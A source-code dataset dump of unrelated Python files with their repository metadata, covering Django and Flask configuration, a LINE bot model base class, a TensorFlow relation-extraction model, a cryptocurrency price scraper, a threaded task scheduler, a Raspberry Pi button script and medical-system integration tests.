def __init__(self, data_source, p=15, k=20):
super().__init__(data_source)
self.p = p
self.k = k
self.data_source = data_source
def __iter__(self):
rand_labels = np.random.permutation(np.arange(len(self.data_source.label_to_samples)))
for labels in grouper(rand_labels, self.p):
for l in labels:
indices = self.data_source.label_to_samples[l]
replace = True if len(indices) < self.k else False
for j in np.random.choice(indices, self.k, replace=replace):
yield j
def __len__(self):
num_labels = len(self.data_source.label_to_samples)
samples = ((num_labels - 1) // self.p + 1) * self.p * self.k
return samples
|
[
"samyuan101234@gmail.com"
] |
samyuan101234@gmail.com
|
ab0c75ec1d40b45a73b6375c1400520dda72e2cd
|
1b9c4798836f7c38782995422efcdbe7b48ed459
|
/fashion/urls.py
|
96ad507ae51d691eb26decda0c9b1a42c8cd09c4
|
[] |
no_license
|
risa4an/fashion-blog
|
44ccff27dbe330665f1eeae460d636f6e8fe2d0d
|
aa46877246aa61b28dfdaea2e495c8e887a24f06
|
refs/heads/master
| 2022-12-22T10:38:48.718814
| 2020-09-16T19:56:55
| 2020-09-16T19:56:55
| 260,867,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
"""fashion URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import include, url
from fashion import settings
from fashion.apps.accounts import views
urlpatterns = [
path('articles/', include('articles.urls'), name = 'home'),
path('admin/', admin.site.urls),
path('', include('accounts.urls')),
path('photographers/', include('photographers.urls'))
]
static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"katya.risunova@gmail.com"
] |
katya.risunova@gmail.com
|
499cc74e02d9c9125a27b10ac84169ce55f05be3
|
7998125d3b2d3d1427f0715e9d7283b3108625c1
|
/wcics/server/forms/forms/admin/topics/create.py
|
f6fdf0312231da71bbd9d63bced8582cbde4eebd
|
[
"MIT"
] |
permissive
|
CS-Center/CS-Center
|
042b74e1c1b829a241260159ee40bf9ffa5a7027
|
3cd09f29d214406e6618fc67b9faf59a18f3f11b
|
refs/heads/master
| 2021-07-03T00:12:38.569492
| 2020-09-16T20:38:39
| 2020-09-16T20:38:39
| 209,430,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
# -*- coding: utf-8 -*-
from wcics.server.forms.validator_sets import *
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField
class TopicSudoCreateForm(FlaskForm):
tid = StringField("ID", admin_topic_create_tid)
name = StringField("Name", admin_topic_create_name)
description = TextAreaField("Description", admin_topic_create_description)
submit = SubmitField("Create")
|
[
"keenan@cscenter.ca"
] |
keenan@cscenter.ca
|
c08ce6dd49ab813444d35c3c9349c72f052e228b
|
5e255ad1360c90478393744586663741a9569c21
|
/linebot/models/base.py
|
164fca9d9e9240236cfe90b9b6b2b37ba835814f
|
[
"Apache-2.0"
] |
permissive
|
line/line-bot-sdk-python
|
d76268e8b542060d6eccbacc5dbfab16960ecc35
|
cffd35948238ae24982173e30b1ea1e595bbefd9
|
refs/heads/master
| 2023-08-31T22:12:31.698183
| 2023-08-28T01:10:09
| 2023-08-28T01:10:09
| 70,553,423
| 1,898
| 1,181
|
Apache-2.0
| 2023-09-11T05:14:07
| 2016-10-11T03:42:26
|
Python
|
UTF-8
|
Python
| false
| false
| 4,121
|
py
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""linebot.models.base module."""
import json
from .. import utils
class Base(object):
"""Base class of model.
Suitable for JSON base data.
"""
def __init__(self, **kwargs):
"""__init__ method.
:param kwargs:
"""
pass
def __str__(self):
"""__str__ method."""
return self.as_json_string()
def __repr__(self):
"""__repr__ method."""
return str(self)
def __eq__(self, other):
"""__eq__ method.
:param other:
"""
return other and self.as_json_dict() == other.as_json_dict()
def __ne__(self, other):
"""__ne__ method.
:param other:
"""
return not self.__eq__(other)
def as_json_string(self):
"""Return JSON string from this object.
:rtype: str
"""
return json.dumps(self.as_json_dict(), sort_keys=True)
def as_json_dict(self):
"""Return dictionary from this object.
:return: dict
"""
data = {}
for key, value in self.__dict__.items():
camel_key = utils.to_camel_case(key)
if isinstance(value, (list, tuple, set)):
data[camel_key] = list()
for item in value:
if hasattr(item, 'as_json_dict'):
data[camel_key].append(item.as_json_dict())
else:
data[camel_key].append(item)
elif hasattr(value, 'as_json_dict'):
data[camel_key] = value.as_json_dict()
elif value is not None:
data[camel_key] = value
return data
@classmethod
def new_from_json_dict(cls, data, use_raw_message=False):
"""Create a new instance from a dict.
:param data: JSON dict
:param bool use_raw_message: Using original Message key as attribute
"""
if use_raw_message:
return cls(use_raw_message=use_raw_message, **data)
new_data = {utils.to_snake_case(key): value
for key, value in data.items()}
return cls(**new_data)
@staticmethod
def get_or_new_from_json_dict(data, cls):
"""Get `cls` object w/ deserialization from json if needed.
If data is instance of cls, return data.
Else if data is instance of dict, create instance from dict.
Else, return None.
:param data:
:param cls:
:rtype: object
"""
if isinstance(data, cls):
return data
elif isinstance(data, dict):
return cls.new_from_json_dict(data)
return None
@staticmethod
def get_or_new_from_json_dict_with_types(
data, cls_map, type_key='type', use_raw_message=False
):
"""Get `cls` object w/ deserialization from json by using type key hint if needed.
If data is instance of one of cls, return data.
Else if data is instance of dict, create instance from dict.
Else, return None.
:param data:
:param cls_map:
:param type_key:
:rtype: object
:param bool use_raw_message: Using original Message key as attribute
"""
if isinstance(data, tuple(cls_map.values())):
return data
elif isinstance(data, dict):
type_val = data[type_key]
if type_val in cls_map:
return cls_map[type_val].new_from_json_dict(data, use_raw_message=use_raw_message)
return None
|
[
"noreply@github.com"
] |
noreply@github.com
|
0e0fbfff7cc2527f4cf77872685c1eba72a8441b
|
368f19de1a70535f3938da92d7278c0296a1b142
|
/fb/manage.py
|
fa01778819c491bc93750de929e949753879bf33
|
[] |
no_license
|
viveksoundrapandi/chrome-aldown
|
82a5f3c679108a146f0c9fd76d8809b868a2933b
|
7a1915534ed90bc647e9775178a6f16a7be8e7a1
|
refs/heads/master
| 2022-11-05T02:12:32.272354
| 2022-10-07T11:29:36
| 2022-10-07T11:29:36
| 5,950,897
| 0
| 1
| null | 2022-10-07T11:29:37
| 2012-09-25T14:03:40
|
Python
|
UTF-8
|
Python
| false
| false
| 245
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "fb.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"vivekhas3@gmail.com"
] |
vivekhas3@gmail.com
|
1db2de63ecb9a8bd60c598385a262b6e2b0785b9
|
a20f8ae0c129927318792ec4547d534dbe38871a
|
/model/pcnn_att_adam.py
|
053182fb9d612e4235924547884f5d4eb3d5a2cb
|
[
"MIT"
] |
permissive
|
zhaohuiqiang/ONRE
|
dbc82abc31271c690252d3f2f5cf799c5f871f83
|
736fc5ff6f12be590d02cb66abb82c1616e1327c
|
refs/heads/master
| 2020-03-31T17:14:35.197909
| 2018-11-20T01:00:47
| 2018-11-20T01:00:47
| 152,414,099
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,028
|
py
|
from framework import Framework
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
def pcnn_att_adam(is_training):
if is_training:
framework = Framework(is_training=True)
else:
framework = Framework(is_training=False)
word_embedding = framework.embedding.word_embedding()
pos_embedding = framework.embedding.pos_embedding()
embedding = framework.embedding.concat_embedding(word_embedding, pos_embedding)
x = framework.encoder.pcnn(embedding, FLAGS.hidden_size, framework.mask, activation=tf.nn.relu)
logit, repre = framework.selector.attention(x, framework.scope, framework.label_for_select)
if is_training:
loss = framework.classifier.softmax_cross_entropy(logit)
output = output(logit)
framework.init_train_model(loss, output, optimizer=tf.train.AdamOptimizer)
framework.load_train_data()
framework.train()
else:
framework.init_test_model(tf.nn.softmax(logit))
framework.load_test_data()
framework.test()
|
[
"346091714@qq.com"
] |
346091714@qq.com
|
dd169cb46861b1832b662aacb471b515ebccff0e
|
afeed161a0bd0e92cdcfcf3c580db8f78719bae8
|
/Milestone_One/bs4_scrape.py
|
9fd1671a4ae3045c68b4492451484a6c4a36dccb
|
[] |
no_license
|
changjung1995/WQD7005_Data_Mining
|
07046b0c8088123c29c0a0eb65126570515b291d
|
3e214835ff527b6e3d2fefa442efae4c60ae527a
|
refs/heads/master
| 2023-05-27T15:10:29.562769
| 2020-06-20T06:46:01
| 2020-06-20T06:46:01
| 246,978,227
| 0
| 1
| null | 2023-05-22T22:45:37
| 2020-03-13T03:11:35
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,317
|
py
|
# -*- coding: utf-8 -*-
"""
@author: Tan Chang Jung & Tan Sia Hong
"""
#%%
import requests
from bs4 import BeautifulSoup
from datetime import date
import time
import pandas as pd
#%%
headers = {'User-Agent' : 'Chrome/74.0.3729.169'}
# select the top 20 from the ranking of cryptocurrencies
cryptocurrency = ['bitcoin','ethereum','xrp','bitcoin-cash','tether',
'bitcoin-sv','litecoin','eos','binance-coin','neo',
'chainlink','cardano','stellar','tron','unus-sed-leo',
'monero','huobi-token','ethereum-classic','crypto-com-coin',
'dash']
#%%
# capture today date
today = date.today().strftime("%Y%m%d")
# format the base url link
base_url = 'https://coinmarketcap.com/currencies/{}/historical-data/?start=20100101&end=' + today
# header
heading = ['Date', 'Open', 'High', 'Low', 'Close', 'Volume', 'Market Capacity']
for cc in cryptocurrency:
url = base_url.format(cc)
response = requests.get(url, headers = headers)
soup = BeautifulSoup(response.content, 'html.parser')
#find html code for table
table = soup.find_all('div', class_='cmc-table__table-wrapper-outer')
table = table[2]
data = []
for rows in table.find_all('tr'):
row = {}
for cols, head in zip(rows.find_all('td'), heading):
row[head] = cols.text.replace('\n','').strip()
data.append(row)
time.sleep(5)
df = pd.DataFrame(data)
df = df.drop(df.index[0]) # remove empty row
df["Date"] = pd.to_datetime(df["Date"]).dt.strftime('%Y-%m-%d')
df['Open'] = df['Open'].str.replace(',','')
df['Open'] = df['Open'].astype('float64').round(2)
df['High'] = df['High'].str.replace(',','')
df['High'] = df['High'].astype('float64').round(2)
df['Low'] = df['Low'].str.replace(',','')
df['Low'] = df['Low'].astype('float64').round(2)
df['Close'] = df['Close'].str.replace(',','')
df['Close'] = df['Close'].astype('float64').round(2)
df['Volume'] = df['Volume'].str.replace(',','')
df['Volume'] = df['Volume'].astype('float64').round(2)
df['Market Capacity'] = df['Market Capacity'].str.replace(',','')
df['Market Capacity'] = df['Market Capacity'].astype('float64').round(2)
# save to csv
df.to_csv(cc + '.csv', index = False)
|
[
"wqd190008@siswa.um.edu.my"
] |
wqd190008@siswa.um.edu.my
|
56b5c5e6c185d48ef5ff9fdb8aa7c49f34eb9f35
|
055b8c0176f9036061c9abd56e18db28eb69111f
|
/venv/bin/pip2.7
|
ff662bae4ff3be2065482ea43c0d8cb0caa9a617
|
[] |
no_license
|
patientplatypus/pythonsimpleskeleton
|
0b56cc589db7ca91ecd7160b28f3556c3e3e153b
|
8bb70d549b8c367fe39ebe73685fd765032e13f7
|
refs/heads/master
| 2021-05-12T08:38:20.330403
| 2018-01-13T21:30:34
| 2018-01-13T21:30:34
| 117,291,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 253
|
7
|
#!/Users/patientplatypus/Documents/python_play/venv/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"pweyand@gmail.com"
] |
pweyand@gmail.com
|
038676f976925f63daee208e21804295dadcdee2
|
0581b790cf9feda6638084fca19a03137baa3ce1
|
/Tron_niezainstalowany/Setup.py
|
e06af08aadc6917f538a6f807b07a7b5e67e0520
|
[] |
no_license
|
Frax123/TRON-GAME-PYTHON
|
127eb4878093eb6419aaa3a7b051f5f54caf1343
|
2524efe0c9718d13f1cd8e74882fe316179d6d4e
|
refs/heads/master
| 2020-05-04T21:54:46.401725
| 2019-04-04T12:35:33
| 2019-04-04T12:35:33
| 179,493,063
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
# -*- coding: utf-8 -*-
import cx_Freeze
executables = [cx_Freeze.Executable('Tron.py')]
cx_Freeze.setup(name = 'Tron',
options = {'build_exe':{'packages': ['pygame'], 'include_files' : ['Red_player.png', 'Blue_player.png', 'Icon.png', 'Wybuch.png']}},
description = 'Tron: First Chapter',
executables = executables)
|
[
"noreply@github.com"
] |
noreply@github.com
|
f76d5f3aec244f5d33fcd7e2887d2eb61bb5658a
|
0b25b1c2ea3e3f05ea388e1105cd2fab50e7ba54
|
/mysite/blog/forms.py
|
68ba9afdb13950be95db2f366aa5aebf783e6d1c
|
[] |
no_license
|
webclinic017/Django-project
|
f8337aeb296d12760143951635d0297c13313a50
|
e757aef633c63aaf857afd1f274d42d16703ca0c
|
refs/heads/master
| 2022-12-25T17:30:14.503627
| 2020-10-12T08:47:08
| 2020-10-12T08:47:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
from django import forms
from .models import Comment
class EmailPostForm(forms.Form):
name = forms.CharField()
email = forms.EmailField()
to = forms.EmailField()
comments = forms.CharField(required=False,
widget=forms.Textarea)
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ('name', 'email', 'body')
|
[
"moreshubham203@gmail.com"
] |
moreshubham203@gmail.com
|
bd0794483225cac132025003cb18438963984fcf
|
178998aecae2aa9d52e43b702abd52fd6ba58b2b
|
/0517/defT.py
|
6a4a7b45c745ddf7f69c664c45c1027a1ac5f75a
|
[] |
no_license
|
www111111/git-new
|
34d664cad5084d9d016f25131eb0d5a8f719d7d1
|
3fd96e79b3c3a67afbc6227db1c69294f75848c0
|
refs/heads/master
| 2020-03-17T10:30:24.560482
| 2018-05-28T12:24:20
| 2018-05-28T12:24:20
| 133,514,309
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
def sum():
a=int(input('a'))
b=input('+')
c=int(input('c'))
e=input('+')
d=int(input('d'))
if(b=='+' and e=='+'):
sum=a+c+d
return(sum)
|
[
"1337872746@qq.com"
] |
1337872746@qq.com
|
cc1984673c8ca18f83d4bb875b6a0454c72c78f0
|
d7bd5d5fd6114ceec28b190434958c5d3e8d0b8a
|
/install_nltk.py
|
046937c12c7ca4cddcc380ea6f28482a1457f08d
|
[] |
no_license
|
jay-cleveland/reddit_data_acquisition
|
1c2529c6063a47c163aa73449004df433f7811b0
|
c1e78b3328c87c7bff034cc63723076a7da89354
|
refs/heads/master
| 2022-10-16T08:52:12.591232
| 2022-09-30T02:08:33
| 2022-09-30T02:08:33
| 105,435,874
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89
|
py
|
import nltk
def main():
nltk.download('punkt')
nltk.download('all-corpora')
main()
|
[
"clevelanjk18@uww.edu"
] |
clevelanjk18@uww.edu
|
241ccb6c7c4ae0c34b892c9d317fbd849d3ea4ef
|
7fba01da6426480612d7cef9ceb2e15f3df6d01c
|
/PYTHON/pythonDesafios/venv/lib/python3.9/site-packages/santos/santos.py
|
b862f2661c3fd15467cd45185f3ff2200ba50eaa
|
[
"MIT"
] |
permissive
|
Santos1000/Curso-Python
|
f320fec1e7ced4c133ade69acaa798d431e14113
|
549223a1633f6f619c87554dd8078cf7841bb1df
|
refs/heads/main
| 2023-05-26T12:01:23.868814
| 2021-05-26T13:22:58
| 2021-05-26T13:22:58
| 371,039,290
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,153
|
py
|
__author__ = 'anderson'
# -*- coding: utf-8 -*-
from threading import Thread
from datetime import datetime
from exceptions import TaskException
import logging
log = logging.getLogger(__name__)
class ControlJobs:
__jobs = []
def stop(self, jobname):
log.debug("Job name %s" % jobname)
log.debug(self.__jobs)
for idx, th in enumerate(self.__jobs):
if jobname in th:
th[jobname]._stop()
del self.__jobs[idx]
break
def addjob(self, job):
self.__jobs.append(job)
log.debug(self.__jobs)
stopjobs = ControlJobs()
class TaskScheduling(Thread):
"""
Os parâmetros aceitos são:
seconds, minutes, hour, time_of_the_day, day_of_the_week, day_of_the_month
Descrição:
O parâmetro seconds define que a função será executada repetidamente na frequência do valor passado em segundos
ex: seconds="20", será executado de 20 em 20 segundos
O parâmetro minutes define que a função será executada repetidamente na frequência do valor passado em minutos
ex: minutes="20", será executado de 20 em 20 minutos
O parâmetro hour define que a função será executada repetidamente na frequência do valor passado em horas
ex: hour="2", será executado de 2 em 2 horas
obs: Esses três parâmetros não podem ser combinados, nem entre e nem com os dois abaixo.
O parâmetro time_of_the_day define que a função será executada todo dia em um horário específico, que deve ser
passado no seguinte formato hh:mm:ss.(hh: 0..23 ; mm: 0..59, ss: 0..59)
ex: time_of_the_day="14:15:00", será executada todo dia às quartoze horas e quinze minutos
O parâmetro day_of_the_week define que a função será executada no dia da semana passado como valor.
Os valores possíveis são: Su(Sunday/Domingo), M(Monday/Segunda), Tu(Tuesday/Terça), W(Wednesday/Quarta),
Th(Thursday/Quinta), F(Friday/Sexta), Sa(Saturday/Sábado) em maiúsculo.
Tem que ser combinado com o parâmetro time_of_the_day para especificar a hora, minuto e segundo daquele
dia da semana.
ex: day_of_the_week="W" time_of_the_day="22:00:00", Será executado toda quarta às vinte e dua horas.
Exemplos de uso:
Basta decorar a função ou método da classe que se queira agendar.
@TaskScheduling(seconds="30")
def do_something(a):
print("Print do_something: %s" % a)
import time
time.sleep(6)
print("terminou do_something")
do_something()
*****************************************
class Teste(object):
@TaskScheduling(time_of_the_day="08:30:00")
def some_function(self, a):
print("Print some_function: %s" % a)
import time
print("Função some_function")
time.sleep(10)
print("terminou some_function")
obj = Teste()
obj.some_function("b")
"""
days = {"M": 0, "Tu": 1, "W": 2, "Th": 3, "F": 4, "Sa": 5, "Su": 6}
#recebe os parametros do decorator
def __init__(self, *arguments, **argumentsMap):
Thread.__init__(self)
self.args = arguments
self.argumentsMap = argumentsMap
self.threadname = argumentsMap["name"]
self.execute = False
log.debug("Arguments: %r:" % self.argumentsMap)
#É o decorador de verdade, recebe a função decorada, como é uma classe preciso implementar o método call
def __call__(self, function):
self.function = function
#recebe os argumentos da função decorada
def task(*functionargs, **functionArgumentsMap):
self.functionargs = functionargs
self.functionArgumentsMap = functionArgumentsMap
stopjobs.addjob({self.threadname: self})
self.start()
return task
def run(self):
try:
log.debug("JOB RUNNING")
import time
self.execute = True
while self.execute:
interval = self.calculateInterval()
log.debug("Interval: %r in seconds" % interval)
time.sleep(interval)
self.function(*self.functionargs, **self.functionArgumentsMap)
except TaskException as t:
log.debug(t)
def _stop(self):
log.debug("STOP")
self.execute = False
return self.execute
def calculateInterval(self):
"""
É responsável por determinar o tempo em segundos da próxima tarefa.
Quando o parâmetro para determinar o tempo da pŕoxima tarefa for time_of_the_day é
chamado o método auxCalculate para determinar tal tempo.
:return:
"""
if "day_of_the_week" in self.argumentsMap:
if "hour" in self.argumentsMap or "minutes" in self.argumentsMap or "seconds" in self.argumentsMap:
raise TaskException("Parametros extras que não combinam")
if "time_of_the_day" in self.argumentsMap:
return self.calculateDayOfTheWeek(self.argumentsMap["day_of_the_week"],
self.argumentsMap["time_of_the_day"])
else:
raise TaskException("Parâmetro time_of_the_day não está presente")
elif "time_of_the_day" in self.argumentsMap:
if "hour" in self.argumentsMap or "minutes" in self.argumentsMap or "seconds" in self.argumentsMap:
raise TaskException("Parametros extras que não combinam")
return self.auxCalculate(self.argumentsMap["time_of_the_day"])[0]
elif "hour" in self.argumentsMap:
if "seconds" in self.argumentsMap or "minutes" in self.argumentsMap:
raise TaskException("Parametros extras que não combinam")
return int(self.argumentsMap["hour"]) * 3600
elif "minutes" in self.argumentsMap:
if "seconds" in self.argumentsMap:
raise TaskException("Parametros extras que não combinam")
else:
return int(self.argumentsMap["minutes"]) * 60
elif "seconds" in self.argumentsMap:
log.debug("seconds")
return int(self.argumentsMap["seconds"])
else:
raise TaskException("Parâmetro(s): %r inválidos" % self.argumentsMap)
def calculateDayOfTheWeek(self, day_of_the_week, time_of_the_day):
entrada = day_of_the_week
weekday = datetime.now().weekday()
dif = self.days[entrada] - weekday
sleep, diference = self.auxCalculate(time_of_the_day)
if self.days[entrada] == weekday:
if diference > 0:
return sleep
else:
return sleep + (6 * (24*3600)) #24 horas para segundo
elif self.days[entrada] > weekday:
if diference > 0:
return sleep + (dif * (24*3600))
else:
#Se a entrada já é o dia seguinte, basta retornar o sleep pois já está calculada o tempo para o horário do outro dia.
if dif == 1:
return sleep
else:
return sleep + ((dif-1) * (24*3600)) #24 horas para segundo
else:
#numero de dias de diferença
resp = 7 - abs(dif)
if diference > 0:
return sleep + (resp * (24*3600))
else:
#Se a entrada já é o dia seguinte, basta retornar o sleep pois já está calculada o tempo para o horário do outro dia.
if resp == 1:
return sleep
else:
return sleep + ((resp-1) * (24*3600)) #24 horas para segundo
def auxCalculate(self, time_of_the_day):
"""
Essa método retorno o tempo em segundos para que a tarefa seja sempre executada na hora escolhida.
:param time_of_the_day:
:return: sleep_time
"""
try:
times = [3600, 60, 1]
one_day_has = '24:00:00'.split(":")
time_day = sum([a*b for a, b in zip(times, [int(i) for i in one_day_has])])
aux_time = time_of_the_day.split(":")
time_want = sum([a*b for a, b in zip(times, [int(i) for i in aux_time])])
#Transforma o tempo atual para segundos
hjf = datetime.now().strftime("%H:%M:%S").split(":")
now = sum([a*b for a, b in zip(times, [int(i) for i in hjf])])
#diferença entre o tempo atual e o tempo desejado em segundos
diference = time_want - now
sleep_time = None
if diference < 0:
#só será executado no outro dia
sleep_time = time_day - (diference * (-1))
else:
#ainda será executado no mesmo dia
sleep_time = diference
except TaskException as t:
log.debug(t)
return sleep_time, diference
|
[
"83990871+Santos1000@users.noreply.github.com"
] |
83990871+Santos1000@users.noreply.github.com
|
90fcefb5891a9d1a1d6662ad1e564dc05696dc70
|
3eadfce7b2238f7d25256976e939b4d0e6c49ebb
|
/switchhello_pd.py
|
d744975e787c98bdb695c2c9c35d6bbe9cb98a3e
|
[
"BSD-2-Clause"
] |
permissive
|
kyab/kazu
|
591d3fc40a9845c9e8d6a22ae1fb1aef8a4441ba
|
9ae0c3cec8ba09770b039825d99cdc53a627b6fd
|
refs/heads/master
| 2021-01-19T04:02:07.279051
| 2016-06-24T23:40:40
| 2016-06-24T23:40:40
| 61,918,052
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 704
|
py
|
import RPi.GPIO as G
import time
import os
import signal
import sys
print "switchhello_pd started."
COUNT = 5
PIN_LED = 17
PIN_SWITCH = 27
def signal_handler(signal, frame):
G.cleanup()
print "GPIO cleanup done."
sys.exit(0)
def wait_and_shout():
G.wait_for_edge(PIN_SWITCH, G.RISING)
print "SWITCH PUSHED"
if G.input(PIN_SWITCH):
print "HIGH"
else:
print "LOW"
G.output(PIN_LED,True)
os.system("aplay -q -D hw:0 ./one.wav &")
time.sleep(0.1)
G.output(PIN_LED,False)
G.setmode(G.BCM)
G.setup(PIN_LED, G.OUT)
G.setup(PIN_SWITCH, G.IN, pull_up_down = G.PUD_DOWN)
signal.signal(signal.SIGINT, signal_handler)
while True:
try:
wait_and_shout()
except:
pass
G.cleanup()
|
[
"kyossi212@gmail.com"
] |
kyossi212@gmail.com
|
52f20985a5f0c10e33313979e29aaeaca9acc59f
|
d806dd4a6791382813d2136283a602207fb4b43c
|
/sirius/blueprints/api/remote_service/tula/test/script.py
|
c571a235f8d6348648f5a6cb22945332ad0645a8
|
[] |
no_license
|
MarsStirner/sirius
|
5bbf2a03dafb7248db481e13aff63ff989fabbc2
|
8839460726cca080ca8549bacd3a498e519c8f96
|
refs/heads/master
| 2021-03-24T12:09:14.673193
| 2017-06-06T16:28:53
| 2017-06-06T16:28:53
| 96,042,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,263
|
py
|
#! coding:utf-8
"""
@author: BARS Group
@date: 25.10.2016
"""
from sirius.app import app
from sirius.blueprints.api.local_service.risar.active.test.test_data import \
get_mr_appointment_data
from sirius.blueprints.api.local_service.risar.passive.test.request import \
send_event_remote, request_local
from sirius.blueprints.api.local_service.risar.passive.test.test_data import \
get_sch_ticket_data_required, get_send_to_mis_card_data, \
get_send_to_mis_first_ticket25_data, get_send_to_mis_measures_data, \
get_send_to_mis_epicrisis_data, get_send_to_mis_second_ticket25_data, \
get_send_to_mis_pc_ticket25_data, get_send_to_mis_first_checkup_data, \
get_send_to_mis_second_checkup_data, get_send_to_mis_pc_checkup_data
from sirius.blueprints.api.remote_service.tula.passive.checkup_first_ticket25.test.request import \
edit_checkup_first_ticket25
from sirius.blueprints.api.remote_service.tula.passive.checkup_first_ticket25.test.test_data import \
get_first_ticket25_data_more
from sirius.blueprints.api.remote_service.tula.passive.childbirth.test.request import \
create_childbirth, edit_childbirth
from sirius.blueprints.api.remote_service.tula.passive.childbirth.test.test_data import \
get_childbirth_data_required, get_childbirth_data_more
from sirius.blueprints.api.remote_service.tula.passive.client.test.request import \
create_client, edit_client
from sirius.blueprints.api.remote_service.tula.passive.client.test.test_data import \
get_client_data_required, get_client_data_more
from sirius.blueprints.api.remote_service.tula.passive.doctor.test.request import \
create_doctor, edit_doctor, delete_doctor
from sirius.blueprints.api.remote_service.tula.passive.doctor.test.test_data import \
get_doctor_data_required, get_doctor_data_more
from sirius.blueprints.api.remote_service.tula.passive.hospitalization.test.request import \
create_hospitalization, edit_hospitalization
from sirius.blueprints.api.remote_service.tula.passive.hospitalization.test.test_data import \
get_meas_hosp_data_required, get_meas_hosp_data_more
from sirius.blueprints.api.remote_service.tula.passive.organization.test.request import \
create_organization, edit_organization, delete_organization
from sirius.blueprints.api.remote_service.tula.passive.organization.test.test_data import \
get_organization_data_required, get_organization_data_more
from sirius.blueprints.api.remote_service.tula.passive.research.test.request import \
create_research, edit_research
from sirius.blueprints.api.remote_service.tula.passive.research.test.test_data import \
get_meas_research_data_required, get_meas_research_data_more
from sirius.blueprints.api.remote_service.tula.passive.specialists_checkup.test.request import \
create_sp_checkup, edit_sp_checkup
from sirius.blueprints.api.remote_service.tula.passive.specialists_checkup.test.test_data import \
get_sp_checkup_data_required, get_sp_checkup_data_more
from sirius.blueprints.api.test.connect import make_login, release_token
risar_session = None
sirius_session = (None, None)
class _TestTula:
def test_mr_auth(self):
global risar_session
if risar_session:
return
with app.app_context():
with make_login() as sess:
risar_session = sess
print 'test_risar_auth', sess
def test_full_cycle(self, testapp):
ext_org_id = org_id = 111
# mis_to_mr_organisation(testapp, ext_org_id)
ext_doctor_id = doctor_id = 112
# mis_to_mr_doctor(testapp, ext_org_id, ext_doctor_id)
ext_client_id = 113
# mis_to_mr_client(testapp, ext_client_id)
client_id = 110
sch_ticket_id = 3928 # 09:00 23.11.16 Тестовый Пользователь (акушер-гинеколог)
# создать запись на прием в вебе (http://10.1.2.13:6600/patients/search/)
# mr_to_mis_sch_ticket(testapp, org_id, doctor_id, client_id, sch_ticket_id)
# card_id = !mr_create_card(testapp, client_id)
card_id = 468 # создать карту в вебе # 690
ext_card_id = 222
# mr_to_mis_card(testapp, client_id, card_id)
# !mr_create_first_checkup(testapp, card_id)
first_checkup_id = 4345 # создать первичный осмотр в вебе
second_checkup_id = 0 # создать вторичный осмотр в вебе
pc_checkup_id = 0 # создать осмотр ПЦ в вебе
# mr_to_mis_first_checkup(testapp, card_id, first_checkup_id)
# mr_to_mis_first_ticket25(testapp, card_id, first_checkup_id)
ext_first_checkup_id = 222
# mr_to_mis_second_ticket25(testapp, card_id, second_checkup_id)
# mr_to_mis_pc_ticket25(testapp, card_id, pc_checkup_id)
# mr_to_mis_first_checkup(testapp, card_id, first_checkup_id)
# mr_to_mis_second_checkup(testapp, card_id, second_checkup_id)
# mr_to_mis_pc_checkup(testapp, card_id, pc_checkup_id)
# создать направления в вебе - осмотр, госпитализация, исследования
# mr_to_mis_measures(testapp, card_id)
# ch_event_measure_id = 6255
# res_event_measure_id = 6258
ext_ch_event_measure_id = 117
ext_res_event_measure_id = 118
ext_sp_checkup_id = 114
# mis_to_mr_meas_sp_checkup(testapp, ext_card_id, ext_org_id, ext_doctor_id,
# ext_ch_event_measure_id, ext_sp_checkup_id)
# ext_hosp_id = 115
# mis_to_mr_meas_hosp(testapp, card_id, ext_org_id, ext_doctor_id, ext_ch_event_measure_id, ext_hosp_id)
ext_research_id = 116
# mis_to_mr_meas_research(testapp, ext_card_id, ext_org_id, ext_doctor_id,
# ext_res_event_measure_id, ext_research_id)
# mis_to_mr_first_ticket25(testapp, ext_card_id, ext_org_id, ext_doctor_id, ext_first_checkup_id)
# mis_to_mr_second_ticket25
# mis_to_mr_pc_ticket25
# mis_to_mr_childbirth(testapp, ext_card_id, ext_org_id, ext_doctor_id)
# mr_to_mis_epicrisis(testapp, card_id)
def mis_to_mr_organisation(testapp, org_id):
# create_organization(testapp, risar_session, get_organization_data_required(org_id))
